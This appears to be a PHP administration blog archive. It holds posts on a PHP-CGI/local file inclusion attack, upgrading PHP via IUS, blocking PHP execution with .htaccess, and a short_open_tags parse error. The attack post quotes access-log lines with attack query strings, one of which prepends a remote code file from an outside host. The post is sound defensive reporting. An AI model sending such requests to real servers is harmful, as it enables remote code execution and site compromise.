Top Nav

Archive | PHP

Local File Inclusion Attacks

We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:


91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"

This page explains the attack:

http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html

One of the compromised sites was Expression Engine and one was Drupal.

Here’s a bit of PHP code that I added to index.php to stop further attacks:

Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.

0

Upgrade PHP on Server with IUS Repository

It’s easy to upgrade between PHP version is you’re using the IUS repository:

http://iuscommunity.org

Start by determining which version and modules you have already installed:

So in this case we have the “php52” packages.

Next decide which package set you want to upgrade to. Right no in IUS the choices are:

  1. php52
  2. php53u
  3. php54

IUS provides a great extension for yum which allows for replacing packages:

Now you can replace the PHP version with something like this:

Just change php52 and php53 to the original and new version that you want to replace.

After the install completes run “yum list | grep php | grep installed” again and make sure that you have all the extensions that you need.

0

Block PHP Execution With .htaccess In Folder

For a server using Plesk add the following lines to a .htaccess file to stop execution of PHP scripts in the folder:

I like to use this to protect cache and image upload folders that are writable by the web server but should not be able to execute code.

As a further precaution, chown the .htaccess to root, so it can’t be overwritten by Apache or FTP, and “chattr +i” to be sure about it.

1

PHP Parse error: syntax error, unexpected $end

There are two common causes to this error:

1. You have an actual syntax error in you code that needs to be fixed.

2. Your code is expecting the PHP “short_open_tags” setting to be turned on and it is not.

This second case is common when you’re moving a site between servers – the old server has short_open_tags turned on and the code works but the new site has it turned off and the code breaks.

The solution to the second case is to either (a) modify the code to remove the dependency on short_open_tags or (b) turn on short_open_tags in php.ini or your .htaccess file.

0